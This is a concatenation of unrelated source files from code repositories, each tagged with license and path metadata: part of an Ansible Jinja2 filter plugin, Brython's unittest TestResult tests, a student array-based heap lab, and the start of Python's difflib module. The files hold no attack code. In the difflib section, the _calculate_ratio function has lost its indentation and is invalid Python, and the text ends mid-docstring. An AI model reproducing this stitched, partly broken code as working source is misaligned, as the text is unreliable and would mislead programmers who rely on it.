    ''' Test if task result yields changed '''
    item = a[0]
    if not isinstance(item, dict):
        raise errors.AnsibleFilterError("|changed expects a dictionary")
    if 'changed' not in item:
        changed = False
        # Looping modules report per-item dicts under 'results' instead of a
        # top-level 'changed' flag; any changed item marks the task changed.
        # The non-empty check fixes an IndexError on 'results': [].
        if ('results' in item
                and isinstance(item['results'], list)
                and item['results']
                and isinstance(item['results'][0], dict)):
            for result in item['results']:
                changed = changed or result.get('changed', False)
    else:
        changed = item.get('changed', False)
    return changed
def skipped(*a, **kw):
    ''' Test if task result yields skipped '''
    task_result = a[0]
    if type(task_result) != dict:
        raise errors.AnsibleFilterError("|skipped expects a dictionary")
    return task_result.get('skipped', False)
@environmentfilter
def do_groupby(environment, value, attribute):
    """Overridden groupby filter for jinja2, to address an issue with
    jinja2>=2.9.0,<2.9.5 where a namedtuple was returned which
    has repr that prevents ansible.template.safe_eval.safe_eval from being
    able to parse and eval the data.

    jinja2<2.9.0,>=2.9.5 is not affected, as <2.9.0 uses a tuple, and
    >=2.9.5 uses a standard tuple repr on the namedtuple.

    The adaptation here, is to run the jinja2 `do_groupby` function, and
    cast all of the namedtuples to a regular tuple.

    See https://github.com/ansible/ansible/issues/20098

    We may be able to remove this in the future.
    """
    # Each element from jinja2's groupby is a (grouper, list) pair; tuple()
    # strips the namedtuple subclass while preserving the contents.
    return [tuple(t) for t in _do_groupby(environment, value, attribute)]
def b64encode(string):
    # Text -> bytes (surrogate-aware) -> base64 bytes -> text.
    return to_text(base64.b64encode(to_bytes(string, errors='surrogate_then_strict')))
def b64decode(string):
    # Inverse of b64encode: text -> bytes -> decoded bytes -> text.
    return to_text(base64.b64decode(to_bytes(string, errors='surrogate_then_strict')))
class FilterModule(object):
    ''' Ansible core jinja2 filters '''

    def filters(self):
        # Registry consumed by Ansible's plugin loader: maps the jinja2 filter
        # name to its implementation.  Several entries are deliberate aliases
        # (failed/failure, success/succeeded, changed/change, skipped/skip).
        return {
            # jinja2 overrides
            'groupby': do_groupby,

            # base 64
            'b64decode': b64decode,
            'b64encode': b64encode,

            # uuid
            'to_uuid': to_uuid,

            # json
            'to_json': to_json,
            'to_nice_json': to_nice_json,
            'from_json': json.loads,

            # yaml
            'to_yaml': to_yaml,
            'to_nice_yaml': to_nice_yaml,
            'from_yaml': from_yaml,

            #date
            'to_datetime': to_datetime,

            # path
            'basename': partial(unicode_wrap, os.path.basename),
            'dirname': partial(unicode_wrap, os.path.dirname),
            'expanduser': partial(unicode_wrap, os.path.expanduser),
            'realpath': partial(unicode_wrap, os.path.realpath),
            'relpath': partial(unicode_wrap, os.path.relpath),
            'splitext': partial(unicode_wrap, os.path.splitext),
            'win_basename': partial(unicode_wrap, ntpath.basename),
            'win_dirname': partial(unicode_wrap, ntpath.dirname),
            'win_splitdrive': partial(unicode_wrap, ntpath.splitdrive),

            # value as boolean
            'bool': to_bool,

            # quote string for shell usage
            'quote': quote,

            # hash filters
            # md5 hex digest of string
            'md5': md5s,
            # sha1 hex digeset of string
            'sha1': checksum_s,
            # checksum of string as used by ansible for checksuming files
            'checksum': checksum_s,
            # generic hashing
            'password_hash': get_encrypted_password,
            'hash': get_hash,

            # file glob
            'fileglob': fileglob,

            # regex
            'regex_replace': regex_replace,
            'regex_escape': regex_escape,
            'regex_search': regex_search,
            'regex_findall': regex_findall,

            # ? : ;
            'ternary': ternary,

            # list
            # random stuff
            'random': rand,
            'shuffle': randomize_list,

            # undefined
            'mandatory': mandatory,

            # merge dicts
            'combine': combine,

            # comment-style decoration
            'comment': comment,

            # array and dict lookups
            'extract': extract,

            # failure testing
            'failed' : failed,
            'failure' : failed,
            'success' : success,
            'succeeded' : success,

            # changed testing
            'changed' : changed,
            'change' : changed,

            # skip testing
            'skipped' : skipped,
            'skip' : skipped,

            # debug
            'type_debug': lambda o: o.__class__.__name__,
        }
| gpl-3.0 |
40223245/w16b_test | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_result.py | 788 | 19069 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
    """Exercises the unittest.TestResult bookkeeping API: start/stop,
    addSuccess/addFailure/addError, description formatting, traceback
    trimming and failfast behaviour."""

    # Note: there are not separate tests for TestResult.wasSuccessful(),
    # TestResult.errors, TestResult.failures, TestResult.testsRun or
    # TestResult.shouldStop because these only have meaning in terms of
    # other TestResult methods.
    #
    # Accordingly, tests for the aforenamed attributes are incorporated
    # in with the tests for the defining methods.
    ################################################################

    def test_init(self):
        result = unittest.TestResult()

        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 0)
        self.assertEqual(result.shouldStop, False)
        self.assertIsNone(result._stdout_buffer)
        self.assertIsNone(result._stderr_buffer)

    # "This method can be called to signal that the set of tests being
    # run should be aborted by setting the TestResult's shouldStop
    # attribute to True."
    def test_stop(self):
        result = unittest.TestResult()

        result.stop()

        self.assertEqual(result.shouldStop, True)

    # "Called when the test case test is about to be run. The default
    # implementation simply increments the instance's testsRun counter."
    def test_startTest(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass

        test = Foo('test_1')

        result = unittest.TestResult()

        result.startTest(test)

        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

        result.stopTest(test)

    # "Called after the test case test has been executed, regardless of
    # the outcome. The default implementation does nothing."
    def test_stopTest(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass

        test = Foo('test_1')

        result = unittest.TestResult()

        result.startTest(test)

        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

        result.stopTest(test)

        # Same tests as above; make sure nothing has changed
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

    # "Called before and after tests are run. The default implementation does nothing."
    def test_startTestRun_stopTestRun(self):
        result = unittest.TestResult()
        result.startTestRun()
        result.stopTestRun()

    # "addSuccess(test)"
    # ...
    # "Called when the test case test succeeds"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addSuccess(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass

        test = Foo('test_1')

        result = unittest.TestResult()

        result.startTest(test)
        result.addSuccess(test)
        result.stopTest(test)

        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

    # "addFailure(test, err)"
    # ...
    # "Called when the test case test signals a failure. err is a tuple of
    # the form returned by sys.exc_info(): (type, value, traceback)"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addFailure(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass

        test = Foo('test_1')
        try:
            test.fail("foo")
        except:
            exc_info_tuple = sys.exc_info()

        result = unittest.TestResult()

        result.startTest(test)
        result.addFailure(test, exc_info_tuple)
        result.stopTest(test)

        self.assertFalse(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 1)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

        test_case, formatted_exc = result.failures[0]
        self.assertTrue(test_case is test)
        self.assertIsInstance(formatted_exc, str)

    # "addError(test, err)"
    # ...
    # "Called when the test case test raises an unexpected exception err
    # is a tuple of the form returned by sys.exc_info():
    # (type, value, traceback)"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addError(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass

        test = Foo('test_1')
        try:
            raise TypeError()
        except:
            exc_info_tuple = sys.exc_info()

        result = unittest.TestResult()

        result.startTest(test)
        result.addError(test, exc_info_tuple)
        result.stopTest(test)

        self.assertFalse(result.wasSuccessful())
        self.assertEqual(len(result.errors), 1)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)

        test_case, formatted_exc = result.errors[0]
        self.assertTrue(test_case is test)
        self.assertIsInstance(formatted_exc, str)

    def testGetDescriptionWithoutDocstring(self):
        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
                'testGetDescriptionWithoutDocstring (' + __name__ +
                '.Test_TestResult)')

    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testGetDescriptionWithOneLineDocstring(self):
        """Tests getDescription() for a method with a docstring."""
        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
               ('testGetDescriptionWithOneLineDocstring '
                '(' + __name__ + '.Test_TestResult)\n'
                'Tests getDescription() for a method with a docstring.'))

    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testGetDescriptionWithMultiLineDocstring(self):
        """Tests getDescription() for a method with a longer docstring.
        The second line of the docstring.
        """
        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
               ('testGetDescriptionWithMultiLineDocstring '
                '(' + __name__ + '.Test_TestResult)\n'
                'Tests getDescription() for a method with a longer '
                'docstring.'))

    def testStackFrameTrimming(self):
        # Frames whose globals carry __unittest are unittest internals and
        # should be trimmed from reported tracebacks.
        class Frame(object):
            class tb_frame(object):
                f_globals = {}
        result = unittest.TestResult()
        self.assertFalse(result._is_relevant_tb_level(Frame))

        Frame.tb_frame.f_globals['__unittest'] = True
        self.assertTrue(result._is_relevant_tb_level(Frame))

    def testFailFast(self):
        # Any error, failure or unexpected success must set shouldStop
        # when failfast is enabled.
        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addError(None, None)
        self.assertTrue(result.shouldStop)

        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addFailure(None, None)
        self.assertTrue(result.shouldStop)

        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addUnexpectedSuccess(None)
        self.assertTrue(result.shouldStop)

    def testFailFastSetByRunner(self):
        runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
        def test(result):
            self.assertTrue(result.failfast)
        result = runner.run(test)
# Build OldResult: a pre-Python-2.7-style result class that lacks the modern
# addSkip/addExpectedFailure/addUnexpectedSuccess hooks, so the suite can
# check unittest's backwards-compatibility warnings.
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
           '__init__'):
    del classDict[m]

def __init__(self, stream=None, descriptions=None, verbosity=None):
    # Minimal state the runner expects on a result object.
    self.failures = []
    self.errors = []
    self.testsRun = 0
    self.shouldStop = False
    self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
    """Checks that unittest degrades gracefully (with a RuntimeWarning)
    when handed a result object missing the post-2.7 add* hooks."""

    def assertOldResultWarning(self, test, failures):
        # Running against OldResult must emit the compatibility warning and
        # record exactly *failures* failures.
        with support.check_warnings(("TestResult has no add.+ method,",
                                     RuntimeWarning)):
            result = OldResult()
            test.run(result)
            self.assertEqual(len(result.failures), failures)

    def testOldTestResult(self):
        class Test(unittest.TestCase):
            def testSkip(self):
                self.skipTest('foobar')
            @unittest.expectedFailure
            def testExpectedFail(self):
                raise TypeError
            @unittest.expectedFailure
            def testUnexpectedSuccess(self):
                pass

        for test_name, should_pass in (('testSkip', True),
                                       ('testExpectedFail', True),
                                       ('testUnexpectedSuccess', False)):
            test = Test(test_name)
            self.assertOldResultWarning(test, int(not should_pass))

    def testOldTestTesultSetup(self):
        class Test(unittest.TestCase):
            def setUp(self):
                self.skipTest('no reason')
            def testFoo(self):
                pass
        self.assertOldResultWarning(Test('testFoo'), 0)

    def testOldTestResultClass(self):
        @unittest.skip('no reason')
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        self.assertOldResultWarning(Test('testFoo'), 0)

    def testOldResultWithRunner(self):
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        runner = unittest.TextTestRunner(resultclass=OldResult,
                                          stream=io.StringIO())
        # This will raise an exception if TextTestRunner can't handle old
        # test result objects
        runner.run(Test('testFoo'))
class MockTraceback(object):
    # Stand-in for the traceback module: always formats to a fixed string so
    # buffered-output tests can assert exact messages.
    @staticmethod
    def format_exception(*_):
        return ['A traceback']
def restore_traceback():
    # Undo the MockTraceback monkey-patch installed by tests (via addCleanup).
    unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
    """Exercises TestResult.buffer: stdout/stderr capture during a test,
    discarding output on success and attaching it to failure/error messages,
    including class/module level fixture errors."""

    def setUp(self):
        # Remember the real streams so tearDown can always restore them.
        self._real_out = sys.stdout
        self._real_err = sys.stderr

    def tearDown(self):
        sys.stdout = self._real_out
        sys.stderr = self._real_err

    def testBufferOutputOff(self):
        real_out = self._real_out
        real_err = self._real_err

        result = unittest.TestResult()
        self.assertFalse(result.buffer)

        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)

        result.startTest(self)

        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)

    def testBufferOutputStartTestAddSuccess(self):
        real_out = self._real_out
        real_err = self._real_err

        result = unittest.TestResult()
        self.assertFalse(result.buffer)

        result.buffer = True

        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)

        result.startTest(self)

        # With buffering on, startTest swaps in StringIO streams.
        self.assertIsNot(real_out, sys.stdout)
        self.assertIsNot(real_err, sys.stderr)
        self.assertIsInstance(sys.stdout, io.StringIO)
        self.assertIsInstance(sys.stderr, io.StringIO)
        self.assertIsNot(sys.stdout, sys.stderr)

        out_stream = sys.stdout
        err_stream = sys.stderr

        result._original_stdout = io.StringIO()
        result._original_stderr = io.StringIO()

        print('foo')
        print('bar', file=sys.stderr)

        self.assertEqual(out_stream.getvalue(), 'foo\n')
        self.assertEqual(err_stream.getvalue(), 'bar\n')

        self.assertEqual(result._original_stdout.getvalue(), '')
        self.assertEqual(result._original_stderr.getvalue(), '')

        result.addSuccess(self)
        result.stopTest(self)

        # On success the captured output is discarded and streams restored.
        self.assertIs(sys.stdout, result._original_stdout)
        self.assertIs(sys.stderr, result._original_stderr)

        self.assertEqual(result._original_stdout.getvalue(), '')
        self.assertEqual(result._original_stderr.getvalue(), '')

        self.assertEqual(out_stream.getvalue(), '')
        self.assertEqual(err_stream.getvalue(), '')

    def getStartedResult(self):
        result = unittest.TestResult()
        result.buffer = True
        result.startTest(self)
        return result

    def testBufferOutputAddErrorOrFailure(self):
        # MockTraceback makes the formatted traceback deterministic.
        unittest.result.traceback = MockTraceback
        self.addCleanup(restore_traceback)

        for message_attr, add_attr, include_error in [
            ('errors', 'addError', True),
            ('failures', 'addFailure', False),
            ('errors', 'addError', True),
            ('failures', 'addFailure', False)
        ]:
            result = self.getStartedResult()
            buffered_out = sys.stdout
            buffered_err = sys.stderr
            result._original_stdout = io.StringIO()
            result._original_stderr = io.StringIO()

            print('foo', file=sys.stdout)
            if include_error:
                print('bar', file=sys.stderr)

            addFunction = getattr(result, add_attr)
            addFunction(self, (None, None, None))
            result.stopTest(self)

            result_list = getattr(result, message_attr)
            self.assertEqual(len(result_list), 1)

            test, message = result_list[0]
            expectedOutMessage = textwrap.dedent("""
                Stdout:
                foo
            """)
            expectedErrMessage = ''
            if include_error:
                expectedErrMessage = textwrap.dedent("""
                Stderr:
                bar
            """)

            expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)

            self.assertIs(test, self)
            # On failure/error the captured output is echoed to the real
            # streams and appended to the stored message.
            self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
            self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
            self.assertMultiLineEqual(message, expectedFullMessage)

    def testBufferSetupClass(self):
        result = unittest.TestResult()
        result.buffer = True

        class Foo(unittest.TestCase):
            @classmethod
            def setUpClass(cls):
                1/0
            def test_foo(self):
                pass
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)

    def testBufferTearDownClass(self):
        result = unittest.TestResult()
        result.buffer = True

        class Foo(unittest.TestCase):
            @classmethod
            def tearDownClass(cls):
                1/0
            def test_foo(self):
                pass
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)

    def testBufferSetUpModule(self):
        result = unittest.TestResult()
        result.buffer = True

        class Foo(unittest.TestCase):
            def test_foo(self):
                pass
        class Module(object):
            @staticmethod
            def setUpModule():
                1/0

        Foo.__module__ = 'Module'
        sys.modules['Module'] = Module
        self.addCleanup(sys.modules.pop, 'Module')
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)

    def testBufferTearDownModule(self):
        result = unittest.TestResult()
        result.buffer = True

        class Foo(unittest.TestCase):
            def test_foo(self):
                pass
        class Module(object):
            @staticmethod
            def tearDownModule():
                1/0

        Foo.__module__ = 'Module'
        sys.modules['Module'] = Module
        self.addCleanup(sys.modules.pop, 'Module')
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| gpl-3.0 |
moiseslorap/RIT | Computer Science 1/Labs/lab11/array_heap.py | 2 | 7303 | """
A Heap implemented by
mapping a tree onto an array (Python list) of the same size.
file: array_heap.py
language: python3
new language feature: passing (and storing) functions as arguments.
"""
import copy
from rit_lib import *
# Utility functions to map tree relations to array indices ###
def parent(i):
    """
    Return index of parent of node at index i.
    """
    parent_index = (i - 1) // 2
    return parent_index
def lChild(i):
    """
    Return index of left child of node at index i.
    """
    return i * 2 + 1
def rChild(i):
    """
    Return index of right child of node at index i.
    """
    return 2 * (i + 1)
############################################################################
def createEmptyHeap(maxSize, compareFunc):
    """
    createEmptyHeap : NatNum * Function -> Heap
    Create an empty heap with capacity maxSize
    and comparison function compareFunc.
    Return initialized heap.
    """
    # Pre-allocate the backing list with None slots; size 0 means none of
    # them are part of the heap yet.  Heap.add() grows the list if needed,
    # so maxSize is only the initial capacity.
    heap = Heap([None for _ in range(maxSize)], 0, compareFunc)
    return heap
class Heap(struct):
    """
    A heap inside an array that may be bigger than the
    heapified section of said array
    SLOTS:
        array: the Python list object used to store the heap
        size: the number of array elements currently in the
             heap. (size-1) is the index of the last element.
        compareFunc: A function to compare values in the heap.
             For example, if compareFunc performs less-than,
             then the heap will be a min-heap.
    """
    _slots = ((list, 'array'), (int, 'size'), (object, 'compareFunc'))

    def displayHeap(self, startIndex=0, indent=""):
        """
        displayHeap : Heap * NatNum * String -> NoneType
        Display the heap as a tree with each child value indented
        from its parent value. Traverse the tree in preorder.
        """
        if startIndex < self.size:
            print(indent + str(self.array[startIndex]))
            self.displayHeap(lChild(startIndex), indent + '    ')
            self.displayHeap(rChild(startIndex), indent + '    ')

    def siftUp(self, startIndex):
        """
        siftUp : Heap * NatNum -> NoneType
        Move the value at startIndex up to its proper spot in
        the given heap. Assume that the value does not have
        to move down.
        """
        i = startIndex
        a = self.array
        # Keep swapping with the parent while the parent should NOT come first.
        while i > 0 and not self.compareFunc(a[parent(i)], a[i]):
            (a[parent(i)], a[i]) = (a[i], a[parent(i)])  # swap
            i = parent(i)

    def _first_of_3(self, index):
        """
        _first_of_3 : Heap * NatNum -> NatNum
        _first_of_3 is a private, utility function.
        Look at the values at:
         - index
         - the left child position of index, if in the heap
         - the right child position of index, if in the heap
        and return the index of the value that should come
        first, according to heap.compareFunc().
        """
        lt = lChild(index)
        rt = rChild(index)
        thisVal = self.array[index]
        if rt < self.size:  # If there are both left and right children
            lVal = self.array[lt]
            rVal = self.array[rt]
            if self.compareFunc(lVal, thisVal) \
               or self.compareFunc(rVal, thisVal):
                if self.compareFunc(lVal, rVal):
                    return lt       # The left child goes first
                else:
                    return rt       # The right child goes first
            else:
                return index        # This one goes first
        elif lt < self.size:        # If there is only a left child
            lVal = self.array[lt]
            if self.compareFunc(lVal, thisVal):
                return lt           # The left child goes first
            else:
                return index        # This one goes first
        else:                       # There are no children
            return index

    def siftDown(self, startIndex):
        """
        siftDown : Heap * NatNum -> NoneType
        Move the value at startIndex down to its proper spot in
        the given heap. Assume that the value does not have
        to move up.
        """
        curIndex = startIndex
        a = self.array
        swapIndex = self._first_of_3( curIndex)
        # Descend until this node comes first among itself and its children.
        while (swapIndex != curIndex):
            (a[swapIndex], a[curIndex]) = (a[curIndex], a[swapIndex])  # swap
            curIndex = swapIndex
            swapIndex = self._first_of_3(curIndex)

    def add(self, newValue):
        """
        add : Heap * Comparable -> NoneType
        add inserts the element at the correct position in the heap.
        """
        # Double the backing array when full, so capacity is not a hard limit.
        if self.size == len(self.array):
            self.array = self.array + ([None] * len(self.array))
        self.array[self.size] = newValue
        self.siftUp(self.size)
        self.size = self.size + 1

    def remove(self):
        """
        remove : Heap -> Comparable
        remove removes and returns the root element in the heap.
        """
        # NOTE(review): assumes a non-empty heap; removing from an empty heap
        # sets size to -1 and misbehaves -- confirm callers guarantee this.
        res = self.array[0]
        self.size = self.size - 1
        # Move the last element to the root, then restore the heap property.
        self.array[0] = self.array[self.size]
        self.array[self.size] = None
        self.siftDown(0)
        return res

    def updateValue(self, index, newValue):
        """
        Fix the heap after changing the value in one of its nodes.
        """
        oldValue = self.array[index]
        self.array[index] = newValue
        # If the new value should come before the old one it can only need to
        # move up; otherwise it can only need to move down.
        if self.compareFunc(newValue, oldValue):
            self.siftUp(index)
        else:
            self.siftDown(index)

    def peek(self):
        """
        peek : Heap -> Comparable
        peek returns a deep copy of the current root/top of the heap
        """
        # Deep copy so callers cannot mutate the stored root in place.
        res = copy.deepcopy(self.array[0])
        return res
############################################################################
def less(a, b):
    """
    less : Comparable * Comparable -> Boolean
    Ordering function for a min-heap: returns True if the first value
    is smaller than or equal to the second (note the comparison is
    non-strict, so equal values also satisfy the ordering).
    """
    return a <= b
def greater(a, b):
    """
    greater : Comparable * Comparable -> Boolean
    Ordering function for a max-heap: returns True if the first value
    is larger than or equal to the second (note the comparison is
    non-strict, so equal values also satisfy the ordering).
    """
    return a >= b
def testHeap(testData):
    """
    testHeap : TupleOfComparable -> NoneType
    Build a min-heap from testData, printing the root every other
    insertion, display it, then exercise updateValue() with one value
    increase and one decrease.
    """
    print( "testHeap(", testData, "):" )
    heap = createEmptyHeap(len(testData), less)
    for position, value in enumerate(testData):
        heap.add(value)
        # Show the running minimum on every even-numbered insertion.
        if position % 2 == 0:
            print( position, "-th iteration's root:", heap.peek( ) )
    print("Heap size is now", heap.size)
    heap.displayHeap()
    print()
    # Perform some heap modifications. Tests updateValue().
    for index, value in ((1, 100), (4, -1)):
        print("Change value at position", index, "to", value)
        heap.updateValue(index, value)
        heap.displayHeap()
        print( "current root:", heap.peek( ) )
if __name__ == '__main__':
    # Fixed demonstration data for the self-test driver.
    sample = (1, 3, 5, 7, 9, 10, 8, 6, 4, 2, 0)
    testHeap(sample)
| mit |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/difflib.py | 19 | 82321 | """
Module difflib -- helpers for computing deltas between objects.
Function get_close_matches(word, possibilities, n=3, cutoff=0.6):
Use SequenceMatcher to return list of the best "good enough" matches.
Function context_diff(a, b):
For two lists of strings, return a delta in context diff format.
Function ndiff(a, b):
Return a delta: the difference between `a` and `b` (lists of strings).
Function restore(delta, which):
Return one of the two sequences that generated an ndiff delta.
Function unified_diff(a, b):
For two lists of strings, return a delta in unified diff format.
Class SequenceMatcher:
A flexible class for comparing pairs of sequences of any type.
Class Differ:
For producing human-readable deltas from sequences of lines of text.
Class HtmlDiff:
For producing HTML side by side comparison with change highlights.
"""
# Public API of this module (controls "from difflib import *").
__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',
           'Differ','IS_CHARACTER_JUNK', 'IS_LINE_JUNK', 'context_diff',
           'unified_diff', 'HtmlDiff', 'Match']
import heapq
from collections import namedtuple as _namedtuple
from functools import reduce
Match = _namedtuple('Match', 'a b size')
def _calculate_ratio(matches, length):
if length:
return 2.0 * matches / length
return 1.0
class SequenceMatcher:
    """
    SequenceMatcher is a flexible class for comparing pairs of sequences of
    any type, so long as the sequence elements are hashable. The basic
    algorithm predates, and is a little fancier than, an algorithm
    published in the late 1980's by Ratcliff and Obershelp under the
    hyperbolic name "gestalt pattern matching". The basic idea is to find
    the longest contiguous matching subsequence that contains no "junk"
    elements (R-O doesn't address junk). The same idea is then applied
    recursively to the pieces of the sequences to the left and to the right
    of the matching subsequence. This does not yield minimal edit
    sequences, but does tend to yield matches that "look right" to people.
    SequenceMatcher tries to compute a "human-friendly diff" between two
    sequences. Unlike e.g. UNIX(tm) diff, the fundamental notion is the
    longest *contiguous* & junk-free matching subsequence. That's what
    catches peoples' eyes. The Windows(tm) windiff has another interesting
    notion, pairing up elements that appear uniquely in each sequence.
    That, and the method here, appear to yield more intuitive difference
    reports than does diff. This method appears to be the least vulnerable
    to synching up on blocks of "junk lines", though (like blank lines in
    ordinary text files, or maybe "<P>" lines in HTML files). That may be
    because this is the only method of the 3 that has a *concept* of
    "junk" <wink>.
    Example, comparing two strings, and considering blanks to be "junk":
    >>> s = SequenceMatcher(lambda x: x == " ",
    ...                     "private Thread currentThread;",
    ...                     "private volatile Thread currentThread;")
    >>>
    .ratio() returns a float in [0, 1], measuring the "similarity" of the
    sequences. As a rule of thumb, a .ratio() value over 0.6 means the
    sequences are close matches:
    >>> print round(s.ratio(), 3)
    0.866
    >>>
    If you're only interested in where the sequences match,
    .get_matching_blocks() is handy:
    >>> for block in s.get_matching_blocks():
    ...     print "a[%d] and b[%d] match for %d elements" % block
    a[0] and b[0] match for 8 elements
    a[8] and b[17] match for 21 elements
    a[29] and b[38] match for 0 elements
    Note that the last tuple returned by .get_matching_blocks() is always a
    dummy, (len(a), len(b), 0), and this is the only case in which the last
    tuple element (number of elements matched) is 0.
    If you want to know how to change the first sequence into the second,
    use .get_opcodes():
    >>> for opcode in s.get_opcodes():
    ...     print "%6s a[%d:%d] b[%d:%d]" % opcode
     equal a[0:8] b[0:8]
    insert a[8:8] b[8:17]
     equal a[8:29] b[17:38]
    See the Differ class for a fancy human-friendly file differencer, which
    uses SequenceMatcher both to compare sequences of lines, and to compare
    sequences of characters within similar (near-matching) lines.
    See also function get_close_matches() in this module, which shows how
    simple code building on SequenceMatcher can be used to do useful work.
    Timing: Basic R-O is cubic time worst case and quadratic time expected
    case. SequenceMatcher is quadratic time for the worst case and has
    expected-case behavior dependent in a complicated way on how many
    elements the sequences have in common; best case time is linear.
    Methods:
    __init__(isjunk=None, a='', b='')
        Construct a SequenceMatcher.
    set_seqs(a, b)
        Set the two sequences to be compared.
    set_seq1(a)
        Set the first sequence to be compared.
    set_seq2(b)
        Set the second sequence to be compared.
    find_longest_match(alo, ahi, blo, bhi)
        Find longest matching block in a[alo:ahi] and b[blo:bhi].
    get_matching_blocks()
        Return list of triples describing matching subsequences.
    get_opcodes()
        Return list of 5-tuples describing how to turn a into b.
    ratio()
        Return a measure of the sequences' similarity (float in [0,1]).
    quick_ratio()
        Return an upper bound on .ratio() relatively quickly.
    real_quick_ratio()
        Return an upper bound on ratio() very quickly.
    """
    def __init__(self, isjunk=None, a='', b='', autojunk=True):
        """Construct a SequenceMatcher.
        Optional arg isjunk is None (the default), or a one-argument
        function that takes a sequence element and returns true iff the
        element is junk. None is equivalent to passing "lambda x: 0", i.e.
        no elements are considered to be junk. For example, pass
            lambda x: x in " \\t"
        if you're comparing lines as sequences of characters, and don't
        want to synch up on blanks or hard tabs.
        Optional arg a is the first of two sequences to be compared. By
        default, an empty string. The elements of a must be hashable. See
        also .set_seqs() and .set_seq1().
        Optional arg b is the second of two sequences to be compared. By
        default, an empty string. The elements of b must be hashable. See
        also .set_seqs() and .set_seq2().
        Optional arg autojunk should be set to False to disable the
